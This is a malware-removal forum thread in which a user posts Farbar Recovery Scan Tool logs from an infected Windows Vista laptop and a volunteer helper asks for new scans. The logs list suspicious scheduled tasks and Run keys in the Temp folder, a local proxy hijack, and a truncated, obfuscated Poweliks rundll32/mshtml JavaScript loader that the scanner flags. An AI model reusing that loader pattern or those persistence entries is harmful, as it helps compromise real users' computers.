Task: {A6AFE3FF-EBD9-4327-A603-C08004EDF913} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {A8BB84DE-677F-48BE-9A35-D1D1A2A0AD5D} - System32\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {A9462BA2-5504-4C3E-8B84-0D9A2F7FC854} - System32\Tasks\582b9f80 => C:\Users\Tyler\AppData\Local\Temp\\setup954247552.exe <==== ATTENTION
Task: {B6A9B53F-7B1E-460E-8B25-417D3CE85E46} - \4104635328 No Task File <==== ATTENTION
Task: {B90EC509-EFFD-479F-B674-1098EF69ADE3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
Task: {BA07379C-921B-4AB1-8585-733D746B82DD} - \3975815936 No Task File <==== ATTENTION
Task: {BB542176-A526-4360-A650-B4A433AA62BA} - \3426028800 No Task File <==== ATTENTION
Task: {C090D641-39F5-4A04-88FD-0FF938662580} - System32\Tasks\win4036e0 => C:\Users\Tyler\AppData\Local\Temp\win4036e0.dat <==== ATTENTION
Task: {C15A3FCC-C99B-46B5-9D09-024F7268B652} - \3436031516 No Task File <==== ATTENTION
Task: {CCC2CDBA-04B8-4B4E-BB8E-2FB9747E7DEB} - System32\Tasks\a0168f00 => C:\Users\Tyler\AppData\Local\Temp\\setup2160826624.exe <==== ATTENTION
Task: {D5C774FE-AA3F-4944-BC4D-6DC2983A11AC} - \1067678144 No Task File <==== ATTENTION
Task: {DFDCAB67-7DAA-42D9-9555-A6C60AD5F35B} - \1015687112 No Task File <==== ATTENTION
Task: {EBC8DC2B-B1E1-4B3B-AD7B-6A54AC321E13} - System32\Tasks\p9pl388102792662700970 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <==== ATTENTION
Task: {ECA6FEB7-4FF1-4A7F-8724-E8C80FD48DFB} - System32\Tasks\c52a4280 => C:\Users\Tyler\AppData\Local\Temp\\setup372887936.exe <==== ATTENTION
Task: {F054D8E5-C40B-40BF-991E-1BFD143B3D9E} - \193991460 No Task File <==== ATTENTION
Task: {FB20997B-71A1-4145-9D52-A9166159F737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-01-04 07:03 - 2009-11-04 13:14 - 00157696 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\lxecdrpp.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2009-03-15 21:15 - 2008-12-22 05:32 - 00054784 _____ () C:\Windows\System32\bcmwlrmt.dll
2014-11-08 21:45 - 2014-11-08 21:45 - 00382848 ____N () C:\ProgramData\Windows Genuine Advantage\{8B34E930-277B-48EB-A692-D7FDBB372FCD}\msiexec.exe
2014-10-17 02:42 - 2014-10-17 02:42 - 00284160 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\df2a920b8e863d14ab8503f96c7b3ecd\VistaBridgeLibrary.ni.dll
2014-10-27 14:27 - 2014-10-21 23:04 - 08910664 _____ () C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-27 14:27 - 2014-10-21 23:04 - 01681224 _____ () C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AESTFilters => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: asurscsi => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: DockLoginService => 2
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: hnmsvc => 2
MSCONFIG\Services: IAANTMON => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: lxec_device => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: sprtsvc_DellSupportCenter => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stllssvr => 3
MSCONFIG\Services: UMVPFSrv => 2
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-879967681-4271235005-1519339517-500 - Administrator - Disabled)
Guest (S-1-5-21-879967681-4271235005-1519339517-501 - Limited - Disabled)
Tyler (S-1-5-21-879967681-4271235005-1519339517-1000 - Administrator - Enabled) => C:\Users\Tyler
 
==================== Faulty Device Manager Devices =============
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Tun Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunmp
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/09/2014 04:00:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16584, time stamp 0x4549b14e, faulting module MSHTML.dll, version 9.0.8112.16584, time stamp 0x541cb3c5, exception code 0xc0000005, fault offset 0x00260cee,
process id 0x2f00, application start time 0xiexplore.exe0.
 
Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:14 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\RETINA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:14 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\RETINA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:13 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\NORMAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (11/08/2014 09:47:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: McAfee Anti-Malware Core150001Restart the service
 
Error: (11/08/2014 09:24:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/08/2014 09:18:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058
 
Error: (11/08/2014 09:18:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058
 
Error: (11/08/2014 09:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/08/2014 08:54:27 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/08/2014 08:51:30 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {209500FC-6B45-4693-8871-6296C4843751}
 
Error: (11/08/2014 08:46:40 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/08/2014 08:46:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058
 
Error: (11/08/2014 08:46:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058
 
 
Microsoft Office Sessions:
=========================
 
CodeIntegrity Errors:
===================================
  Date: 2014-11-09 06:04:55.240
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:51.421
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:46.506
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:41.715
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:33.745
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:31.596
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:28.678
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:25.676
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:02:25.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:02:22.656
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 60%
Total physical RAM: 3033.63 MB
Available physical RAM: 1184.88 MB
Total Pagefile: 6269.51 MB
Available Pagefile: 3676.27 MB
Total Virtual: 2047.88 MB
Available Virtual: 1877.33 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:218.2 GB) (Free:35.88 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive e: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:8.72 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 2F03C1E0)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=14.6 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=218.2 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
Link to post
Share on other sites

Hello booya119 and :welcome:! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend you to keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don’t hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.
Sorry for delay!

Do you still need help? If you still need help, please manually delete FRST.exe, download a new fresh one and generate log files.

Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-11-2014 01

Ran by Tyler (administrator) on TYLER-PC on 13-11-2014 18:59:29

Running from C:\Users\Tyler\Downloads

Loaded Profile: Tyler (Available profiles: Tyler)

Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)

Internet Explorer Version 9

Boot Mode: Normal


 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\stacsv.exe

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe

(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe

() C:\Program Files\DivX\DivX Update\DivXUpdate.exe

(SupportSoft, Inc.) C:\Program Files\Dell Support Center\bin\sprtcmd.exe

(Dell Inc.) C:\Windows\System32\WLTRAY.EXE

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe

(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

() C:\Program Files\Pando Networks\Media Booster\PMB.exe

(Microsoft Corporation) C:\Windows\ehome\ehtray.exe

(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe

(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe

(Microsoft Corporation) C:\Windows\System32\taskmgr.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Microsoft Corporation) C:\Windows\System32\conime.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe

(Microsoft Corporation) C:\Windows\System32\wuauclt.exe

(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\mcods.exe

 

 

==================== Registry (Whitelisted) ==================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)

HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [483420 2008-12-14] (IDT, Inc.)

HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.)

HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [1662032 2008-08-27] (Dell Inc.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)

HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)

HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)

HKLM\...\Run: [iAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [178712 2008-05-07] (Intel Corporation)

HKLM\...\Run: [DivXUpdate] => C:\Program Files\DivX\DivX Update\DivXUpdate.exe [1263952 2013-02-12] ()

HKLM\...\Run: [DivXMediaServer] => C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-01-29] (DivX, LLC)

HKLM\...\Run: [dellsupportcenter] => C:\Program Files\Dell Support Center\bin\sprtcmd.exe [206064 2008-10-04] (SupportSoft, Inc.)

HKLM\...\Run: [broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [3810304 2008-12-22] (Dell Inc.)

HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [200704 2008-09-04] (Alps Electric Co., Ltd.)

HKLM\...\Run: [amd_dc_opt] => C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500208 2010-03-06] (Adobe Systems Incorporated)

HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2012-12-19] (Adobe Systems Incorporated)

HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2012-12-03] (Adobe Systems Incorporated)

HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)

HKLM\...\RunOnce: [b Register C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll] => "C:\Windows\system32\rundll32.exe" "C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll",DllRegisterServer

Winlogon\Notify\GoToAssist: C:\Program Files\Citrix\GoToAssist\514\G2AWinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)

HKLM\...\Policies\Explorer: [NoControlPanel] 0

HKLM\...\Policies\Explorer: [NoFolderOptions] 0

HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter

HKU\S-1-5-19\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter

HKU\S-1-5-20\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [winupd] => C:\Users\Tyler\AppData\Local\Temp:winupd.exe

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [Pando Media Booster] => C:\Program Files\Pando Networks\Media Booster\PMB.exe [3077528 2011-08-17] ()

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [p9pl5944863637826728850] => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [p9pl388102792662700970] => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [Google Update] => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-09-19] (Google Inc.)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [-694390270] => C:\Users\Tyler\AppData\Local\Temp\thpm3029530543124544682.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [{79BF4901-1EC4-4726-B3C2-A7859706C6E7}] => "C:\Users\Tyler\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QZDS6Q57\LeagueofLegends_NA_Installer_05_07_13.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{79BF4901-1EC4-4726-B3 (the data entry has 17 more characters).

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [EvolveClient] => C:\Program Files\Echobit\Evolve\EvolveClient.exe [3332512 2014-09-23] (Echobit LLC)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [DellSystemDetect] => C:\Users\Tyler\AppData\Local\Apps\2.0\BB45JB1N.PVP\VOEHN7TA.V0B\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe [254976 2014-05-08] (Dell)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [acillao] => rundll32 "C:\Users\Tyler\AppData\Local\acillao.dll",acillao <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

HKU\S-1-5-18\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell Remote Access.lnk

ShortcutTarget: Dell Remote Access.lnk -> c:\Windows\Installer\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}\NewShortcut10_F66A31D978314FBABA02C411C0047CC5.exe (Macrovision Corporation)

Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyServer: ftp=127.0.0.1:52081;http=127.0.0.1:52081;https=127.0.0.1:52081

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/spbasic.htm

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 

BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

